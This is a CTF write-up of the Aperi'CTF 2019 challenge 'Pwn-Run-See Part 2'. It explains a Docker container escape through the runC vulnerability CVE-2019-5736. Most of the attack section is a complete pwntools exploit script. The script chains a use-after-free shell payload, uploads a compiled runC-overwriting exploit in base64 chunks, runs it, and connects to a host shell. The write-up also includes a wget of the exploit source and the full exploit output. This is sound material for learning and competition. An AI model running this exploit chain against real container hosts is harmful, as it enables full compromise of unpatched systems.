+++
title = "Pwn-Run-See - Part 2"
description = "Aperi'CTF 2019 - Pwn (250 pts)"
keywords = "privesc, privilege escalation, docker, exploit, runc, escape, container, cve, cve-2019-5736, binary exploitation, remote, pwn, exploitation binaire, WriteUp, CTF, Aperi'CTF, Apéri'CTF, Aperi'CTF, ApériCTF, Aperi'Kube, Apéri'Kube, AperiKube, ApériKube"
date = "2019-09-14T00:00:00+02:00"
weight = 20
draft = false
bref = "Aperi'CTF 2019 - Pwn (250 pts)"
toc = true
+++

# Aperi'CTF 2019 - Pwn-Run-See - Part 2

### Challenge details

| Event          | Challenge            | Category | Points | Solves |
|----------------|----------------------|----------|--------|--------|
| Aperi'CTF 2019 | Pwn-Run-See - Part 2 | Pwn      | 250    | 2      |

We’re given a [docker-compose.yml](/files/aperictf_2019/pwn_run_see/docker-compose.yml) configuration file.

Task description:

 > Reynholm Industries' ticket management service seems to be running in a container, fortunately you found its configuration file on the Internet.
 >
 > Find a way to take control of the hosting server and learn more about Reynholm Industries.

The task is to get out of the container using the access we got from the previous step.

### Post exploitation

First, we've to ensure that we're running in a Docker container. Since Docker container relies on [cgroups](http://man7.org/linux/man-pages/man7/cgroups.7.html) and [namespaces](http://man7.org/linux/man-pages/man7/namespaces.7.html) to isolate itself from the host and other containers, we can check if our devices belongs to a specific control group:

```bash
cat /proc/1/cgroup
```

    10:memory:/docker/b505d9295ae5c8b25b2e2e4d8be0833fb290818c44f0a1af95485ec16d5482fc
    9:cpuset:/docker/b505d9295ae5c8b25b2e2e4d8be0833fb290818c44f0a1af95485ec16d5482fc
    8:freezer:/docker/b505d9295ae5c8b25b2e2e4d8be0833fb290818c44f0a1af95485ec16d5482fc
    7:blkio:/docker/b505d9295ae5c8b25b2e2e4d8be0833fb290818c44f0a1af95485ec16d5482fc
    6:pids:/docker/b505d9295ae5c8b25b2e2e4d8be0833fb290818c44f0a1af95485ec16d5482fc
    5:perf_event:/docker/b505d9295ae5c8b25b2e2e4d8be0833fb290818c44f0a1af95485ec16d5482fc
    4:net_cls,net_prio:/docker/b505d9295ae5c8b25b2e2e4d8be0833fb290818c44f0a1af95485ec16d5482fc
    3:cpu,cpuacct:/docker/b505d9295ae5c8b25b2e2e4d8be0833fb290818c44f0a1af95485ec16d5482fc
    2:devices:/docker/b505d9295ae5c8b25b2e2e4d8be0833fb290818c44f0a1af95485ec16d5482fc
    1:name=systemd:/docker/b505d9295ae5c8b25b2e2e4d8be0833fb290818c44f0a1af95485ec16d5482fc

It's definitely a Docker container named `b505d9295ae5c8b25b2e2e4d8be0833fb290818c44f0a1af95485ec16d5482fc`! Let's inspect its init command line (https://docs.docker.com/engine/reference/run/#cmd-default-command-or-options):

```bash
cat /proc/1/cmdline
```

    /bin/bash\x00/start.sh\x00

#### start.sh

Looking at the command line of the init process, we can retrieve the starting script of the Docker container:

```bash
#!/bin/bash

/etc/init.d/xinetd start
sleep infinity
```

Nothing really noteworthy, it's basically a startup script for `xinetd` which is used to serve the challenge application (see [first step](WRITEUP_PART1.md)).

Since it's the only process that'll be executed in the Docker container, there's probably something that we can exploit to escape the Docker container. What about the Docker volumes?

#### Docker volumes

To list the Docker volumes from the inside of the container, we can simply enum the mount points and see which one has been mounted from a physical volume (actually virtual but it's seen as a physical volume inside the container):

```bash
mount | grep -E "^/dev/"
```

    /dev/sda1 on /etc/xinetd.conf type ext4 (ro,relatime,errors=remount-ro,data=ordered)
    /dev/sda1 on /data/chall type ext4 (ro,relatime,errors=remount-ro,data=ordered)
    /dev/sda1 on /data/flag type ext4 (ro,relatime,errors=remount-ro,data=ordered)
    /dev/sda1 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
    /dev/sda1 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
    /dev/sda1 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)
    /dev/sda1 on /etc/xinetd.d/ctf type ext4 (ro,relatime,errors=remount-ro,data=ordered)

Once again, there is nothing really interesting, the `hostname`, `resolv.conf` and `hosts` files are writable and the other challenge files are read-only.

Let's take a look at the given [docker-compose.yml](/files/aperictf_2019/pwn_run_see/docker-compose.yml) configuration file.

#### docker-compose.yml

Analyzing the docker-compose.yml file is pretty obvious since it's a well-known and well-configured file (see [the documentation](https://docs.docker.com/compose/compose-file/)).

##### Services

There is only one service called `pwn-run-see`.

##### Image

The container is running over the [`creased/xinetd:latest`](https://hub.docker.com/r/creased/xinetd) image which is public.

Let's analyze this image using [dive](https://github.com/wagoodman/dive):

```bash
docker pull creased/xinetd:latest
dive -j report.json creased/xinetd:latest
```

Result:

```json
{
  "layer": [
    {
      "index": 0,
      "digestId": "sha256:5dacd731af1b0386ead06c8b1feff9f65d9e0bdfec032d2cd0bc03690698feda",
      "sizeBytes": 55266564,
      "command": "#(nop) ADD file:4fc310c0cb879c876c5c0f571af665a0d24d36cb9263e0f53b0cda2f7e4b1844 in / "
    },
    {
      "index": 1,
      "digestId": "sha256:8d97195c3bcc2b294a2eecbb5242caed8d5ffc3356e17bf8e3c637f944508489",
      "sizeBytes": 74212807,
      "command": "dpkg --add-architecture i386 \u0026\u0026     apt-get update \u0026\u0026     apt-get install -y --no-install-recommends --no-install-suggests xinetd netcat libc6-dev:i386"
    },
    {
      "index": 2,
      "digestId": "sha256:3601e14907cf56f86dba0e629bdff11d506865d9a1105ec48a354436f078a640",
      "sizeBytes": 53,
      "command": "#(nop) COPY file:fcc7929a516a9e79c7885f2e1e0849709d244b51905e391ccebf1fd9c6ec6bf3 in /start.sh "
    },
    {
      "index": 3,
      "digestId": "sha256:bc0e8f5e03cfbcbf38adff43bdbeddab00940176308c96e03e1be00217f3c89f",
      "sizeBytes": 53,
      "command": "chmod +x /start.sh"
    },
    {
      "index": 4,
      "digestId": "sha256:6a316e08802ea113fe51b1c30b5b5cb6a675a4591ebc0d479d14eeae82e30f68",
      "sizeBytes": 0,
      "command": "#(nop) WORKDIR /data"
    }
  ]
}
```

The container is based on `debian:stretch-slim` and basically embbed a `xinetd` service and `netcat`. Nothing really relevant here.

##### Security

No user remapping has been configured and the container is running in [privileged mode](https://blog.docker.com/2013/09/docker-can-now-run-within-docker/). It's a valuable information since the privileged mode allows us to exploit extended Linux capabilities.

##### Healthcheck

An healthcheck has been configured and is used apparently to ping the `xinetd` service using `netcat` every 10 seconds.

Let's see if we see this process from the inside of the container using a beautiful oneline (don't blame me, there is no Python script interpreter in the container &#128516;):

```bash
echo 'while true; do touch ./watchdog; find /proc -maxdepth 1 -type d -name "[0-9]*" -cnewer ./watchdog -exec sh -c "cat {}/cmdline | grep -Eav '"'"'(cat)|(grep)|(sleep)|(touch)|(search\.sh)'"'"'" \; 2>/dev/null; done' >search.sh
chmod +x search.sh
./search.sh
```

    runc\x00init\x00
    runc\x00init\x00

A `runC` process is spawned every 10 seconds which corresponds to our healthcheck process.

#### runC process

The `runC init` process is responsible of running the healthcheck process inside the container and is executed in memory using the `memfd_create()` function.

The [`memfd_create()`](http://man7.org/linux/man-pages/man2/memfd_create.2.html) system call is close to [malloc()](https://linux.die.net/man/3/malloc) but it does not return a pointer to the allocated memory but rather returns a file descriptor that refers to an anonymous file that is only visible in the filesystem as a link in `/proc/PID/fd/` which may be used to execute it using [`execve()`](https://linux.die.net/man/2/execve).

 > The name supplied in name is used as a filename and will be displayed as the target of the corresponding symbolic link in the directory /proc/self/fd/.

There was a flaw in the way runC handled system file descriptors when running containers that allows us to overwrite content of the `runC` binary and consequently run arbitrary commands on the container host system.

The security flaw has been fixed to create a temporary copy of the calling binary itself when it starts or attaches to containers, thus allowing to prevent further modifications.

To summarize the `/proc/PID/exe` file is a symbolic link created by the kernel for every process which points to the binary that was executed for that process, in this case the host `runC` binary which can be overwritten in a privileged Docker container.

### Escaping Docker container

To exploit this vulnerability, I've developped a new C exploit based on the original post from [DragonSector's blog](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html).

The exploit consists in:

 1. Waiting for a `runC` process to spawn in the Docker container
 2. Creating a new file descriptor to lock the original file descriptor
 3. Opening it for writing
 4. Overwriting the `runC` binary
 5. Waiting for the next `runC` process to spawn to finally get a shell on the host system

The exploit can be picked on my [GitHub Gist repo](https://gist.githubusercontent.com/Creased/d4c493cac872ff373f9c05c8e7d0f839/raw/cve-2019-5736.c).

To drop the exploit on the remote system, we can use `pwntools` and pipe the compressed pre-compiled exploit to the remote system:

```bash
wget https://gist.githubusercontent.com/Creased/d4c493cac872ff373f9c05c8e7d0f839/raw/cve-2019-5736.c
gcc -Wall -static -Os -s -o cve-2019-5736 cve-2019-5736.c
```

Exploitation:

```python
#!/usr/bin/python2
# coding: utf8

import base64
import os
import gzip
import time

from io import BytesIO
from pwn import *

MAX_SIZE = 768  # Change if an error occurs while sending the exploit.
PROMPT = "# "
GDB = False
LOCAL_EXPLOIT = 'cve-2019-5736'
REMOTE_EXPLOIT = '/data/exploit'
HOST = '192.168.4.5'

context.log_level = 'info'

## CREATE PROCESS
log.info('Opening a remote connection...')
p = remote(HOST, 31337)

if GDB:
    gdb_cmd = 'c'
    gdb.attach(p, gdb_cmd)

## LOAD ELF / LIBC
elf = ELF('./files/chall')

def recv_menu():
    p.recvuntil('Your choice:\n=> ')

def new_ticket(name, service, description):
    p.sendline('3')
    p.recvuntil('Your name: ')
    p.sendline(name)
    p.recvuntil('The destination service: ')
    p.sendline(service)
    p.recvuntil('Description: ')
    p.sendline(description)
    recv_menu()

def process_tickets():
    p.sendline('4')

## GET SHELL
log.info('Stage 1 - Get a shell!\n')
recv_menu()

run_task = elf.symbols['run_task']

log.info('Creating junk tickets...')
new_ticket('Blah', 'ADM', 'Junk')
new_ticket('Blah', 'ADM', 'Junk')
new_ticket('Blah', 'ADM', 'Junk')
new_ticket('Blah', 'ADM', 'Junk')

log.info('Creating an intern...')
new_ticket('Blah', 'ADM', 'Create intern')

process_tickets()
recv_menu()

log.info('Overwriting the intern...')
new_ticket("The giver", "ADM", '%s/bin/sh' % p32(run_task))
new_ticket("Get flag", "ADM", "-i")

log.info('Getting a shell...')
process_tickets()
p.recvuntil(PROMPT)

p.sendline('cat /data/flag')
flag1 = p.recvline()

log.info('Flag 1: %s' % flag1)

log.info('Stage 2 - Escape the Docker container!\n')

## SEND EXPLOIT

### Compress the exploit using gzip.
log.info('Compressing the exploit...')

buf = BytesIO()
with open(LOCAL_EXPLOIT, 'rb') as exploit_fd:
    exploit = exploit_fd.read()

with gzip.GzipFile(mode='wb', fileobj=buf) as fd:
    fd.write(exploit)

### Encode it in base64.
exploit = base64.b64encode(buf.getvalue())

### Flush the tube.
log.info('Flushing the tube...')
p.recvuntil(PROMPT)

### Send the base64(gzip(exploit)) on the remote host.
log.info('Sending the exploit...')

start_time = time.time()

p.sendline('>{0}.z'.format(REMOTE_EXPLOIT))
p.recvuntil(PROMPT)

#### Chunking send.
for i in range(0, len(exploit), MAX_SIZE):
    chunk = exploit[i:i+MAX_SIZE]
    p.sendline('echo -n "{0}" >>{1}.z'.format(chunk, REMOTE_EXPLOIT))
    p.recvuntil(PROMPT)
    log.info('Send: {0}/{1}'.format(i, len(exploit)))

elapsed_time = time.time() - start_time
log.success('Exploit has been sent in {}!'.format(time.strftime('%H:%M:%S', time.gmtime(elapsed_time))))

### Decompress the exploit on the remote host.
log.info('Decompressing the exploit...')
p.sendline('cat {0}.z | base64 -d - | gzip -dcq >{0}'.format(REMOTE_EXPLOIT))

### Mark the exploit as executable.
p.sendline('chmod +x {0}'.format(REMOTE_EXPLOIT))
p.recvuntil(PROMPT)

### Run the exploit.
log.info('Running the exploit...')
p.sendline('{0}'.format(REMOTE_EXPLOIT))
p.recvuntil('[+] Successfully overwritten the file!\n')

sleep(2)

### Get remote shell
log.info('Getting a reverse shell...')
p2 = remote(HOST, 31338)

## Get flag
p2.sendline('cat /root/flag')
flag2 = p.recvline(timeout=0.5)

log.info('Flag 2: %s' % flag2)

p2.interactive()
p.interactive()
p.close()
p2.close()
```

    [*] Stage 1 - Get a shell!
    [*] Creating junk tickets...
    [*] Creating an intern...
    [*] Overwriting the intern...
    [*] Getting a shell...
    [*] Flag 1: APRK{Us3_3m_4Ll_4f73r_fR3e!}
    [*] Stage 2 - Escape the Docker container!
    [*] Compressing the exploit...
    [*] Flushing the tube...
    [*] Sending the exploit...
    [*] Send: 0/379792
    ...
    [*] Send: 379392/379792
    [+] Exploit has been sent in 00:00:00!
    [*] Decompressing the exploit...
    [*] Running the exploit...
    [*] Getting a reverse shell...
    [*] Flag 2:
    [*] Switching to interactive mode
    APRK{N3V3r_l0ok_b4cK_4Nd_w1n_thE_RAc3!}
    $

The final flag is `APRK{N3V3r_l0ok_b4cK_4Nd_w1n_thE_RAc3!}`

*Happy Hacking!*

[*Creased*](https://twitter.com/Creased_)
